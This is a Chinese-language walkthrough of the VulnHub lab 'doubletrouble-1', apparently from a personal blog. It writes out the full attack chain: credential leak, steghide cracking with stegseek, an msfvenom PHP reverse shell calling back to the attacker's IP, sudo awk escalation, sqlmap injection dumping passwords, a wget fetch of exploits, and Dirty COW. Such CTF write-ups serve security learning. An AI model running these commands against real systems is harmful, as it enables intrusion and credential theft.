『vulnhub系列』doubletrouble-1

『vulnhub系列』doubletrouble-1

下载地址

https://www.vulnhub.com/entry/doubletrouble-1,743/

信息搜集

使用命令，获得存活靶机IP为138，开启端口22和80

nmap 192.168.0.* #因为当前NAT模式，攻击机和靶机在一个内网环境中

访问80的web服务，是一个登录页面

又是qdPm，之前做过一个qdpm的题目，于是我们就知道了qdpm存在密码泄露漏洞。我们来看一下

searchsploit qdpm

我们发现密码泄露漏洞是50176.txt，查看，发现我们可以去http://<website>/core/config/databases.yml 这个目录下，获得数据库的用户名密码

searchsploit -m 50176.txt #将50176.txt存到当前目录
cat 50176.txt

访问后，得到用户名：密码— otis :rush

但我们发现，靶机的3306端口并没有开，继续信息搜集

使用dirsearch爆破目录，得到如下目录，发现secret目录

dirsearch -u "http://192.168.0.138/"

访问/secret目录里面都有一个doubletrouble.jpg

打开图片，发现图片里有我们刚刚获取的用户名和密码Otis：Rush

但目前这些信息并没有什么用，因此想到了以前做CTF时候的隐写术，丢到WinHex里并没有发现什么东西，我们搜索jpg相关的隐写术，发现有一种steghide隐写，可以在linux中使用。

Steghide 是一个可用于隐写术的工具。它允许您在音频和图像文件中嵌入秘密信息，包括 JPEG、BMP、WAV 和 AU 文件。 Steghide 允许：

• 嵌入数据的加密。
• 嵌入数据的压缩。
• 嵌入校验和以验证提取的数据的完整性。

我们安装一下，并试一下，发现需要密码

apt-get install steghide #安装
steghide info doubletrouble.jpg #查看图片信息

然后StegHide是隐写工具，现在我们是要破解它隐写后的密码，这里用到了另一个工具：Stegseek

Stegseek是迄今为止全世界最快的Steghide破解qi，该工具每秒能够处理数百万的密码。虽然Stegseek是一款轻量级工具，但丝毫不影响其功能性的强大。该工具作为原始Steghide项目的一个分支而构建，它的速度比其他破解qi快上千倍。在该工具的帮助下，广大研究人员可以轻松从使用了Steghide隐写&加密的文件中提取出隐藏的数据。

除此之外，Stegseek还可以用来提取Steghide的元数据，我们可以利用这些信息来判断一个文件中是否包含了Steghide数据。

值得一提的是，仅需两秒钟，该工具就可以跑完rockyou.txt字典。而众所周知，rockyou.txt是一个包含了超过1400万个密码的强大字典文件。

apt install stegseek

然后我们使用/usr/share/wordlist/rockyou.txt.gz 解压后的rockyou.txt来进行暴力破解

得到密码92camaro

stegseek doubletrouble.jpg rockyou.txt

再次查看图片信息，输入密码，发现有一个creds.txt

steghide info doubletrouble.jpg

分离文件，输入密码，得到creds.txt 查看一下，得到邮箱：密码otisrush@localhost.com:otis666

steghide extract -sf doubletrouble.jpg
cat creds.txt

登录成功

漏洞利用

我们发现可以上传文件

我们使用msf生成一个php反弹木马，上传

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.130 lport=4444 -o re_shell.php

上传成功

我们使用msf进行监听,设置options与生成的木马一一对应

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.130
set lport 4444

然后我们刚刚扫描的时候，发现有一个uploads目录，我们访问一下其下的目录attachments

发现我们刚上传的文件已经上传成功了

我们在攻击机输入run开启监听

访问php文件，反弹成功

现在的权限是网站权限

权限提升：

使用py获取交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

使用命令查看带有SUID权限的文件，发现并没有什么东西

find / -perm -u=s -type f 2>/dev/null

使用命令查看可以使用root权限执行的命令，发现awk命令可以以root权限执行

sudo -l

因此我们可以借助awk进行sudo提权

sudo awk 'BEGIN{system("/bin/bash")}'

关于sudo提权可以看我之前的文章sudo滥用提权 | Don_Joshua's Blog (jo4hua.github.io)

提权成功

进入到root目录……发现……还有一个靶机，将其移动到/var/www/html目录下

输入网址+镜像名，下载，开机

http://192.168.0.138/doubletrouble.ova

第二层靶机

信息搜集：

依旧使用nmap找到存活主机

访问80端口web服务，是一个登录页面

使用之前的otis用户名和密码，登陆失败，没有回显，可能是sql注入？使用sqlmap尝试一下吧

漏洞利用：

首先查看源代码，用的是post方式传uname,psw

使用sqlmap，存在时间盲注

sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123"

使用命令，得到数据库doubletrouble 另一个是默认表

sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" --dbs --batch

继续爆破表

sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" -D doubletrouble --tables --batch

爆破字段

sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" -D doubletrouble -T users --columns --batch

爆破内容，得到用户名密码montreux | GfsZxc1 clapton | ZubZub99

sqlmap -u http://192.168.0.139/index.php --data="uname=admin&psw=123" -D doubletrouble -T users -C username,password --dump --batch

然后我们登录，发现登录不上，那现在只剩一个地方了

没错就是ssh了，使用第二个用户和密码登陆成功，获得普通用户权限

ssh clapton@192.168.0.139

权限提升：

老套路，先查看具有SUID权限的文件,发现一个exim4有些可疑

 find / -perm -u=s -type f 2>/dev/null

搜一下，发现可以进行SUID提权，使用命令查看一下版本

/usr/sbin/exim4 --version

寻找对应版本漏洞，下载

searchsploit Exim 4.80
searchsploit -m 35951.py

开启apache服务，将exp移动到/var/www/html目录下

service apache2 start
mv 35951.py /var/www/html

使用靶机下载exp

wget http://192.168.0.130/35951.py

发现这几个exp都不好用

接下来查看系统内核信息

uname -a

直接上脏牛提权吧，发现我们的内核版本在可利用范围内

searchspolit dirty

重复上述过程，我们将40847.cpp上传到靶机上，赋予执行权限

wget http://192.168.0.130/40847.cpp #靶机下载exp

chmod +x 40847.cpp #赋予运行权限

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 1 40847.cpp -lutil #编译一下，输出为1

运行1，得到root密码

./1 运行

使用su切换为root用户，输入密码，获取root权限

成果：

获取普通权限的时候，发现user.txt

6CEA7A737C7C651F6DA7669109B5FB52

在root目录下cat root.txt可得

1B8EEA89EA92CECB931E3CC25AA8DE21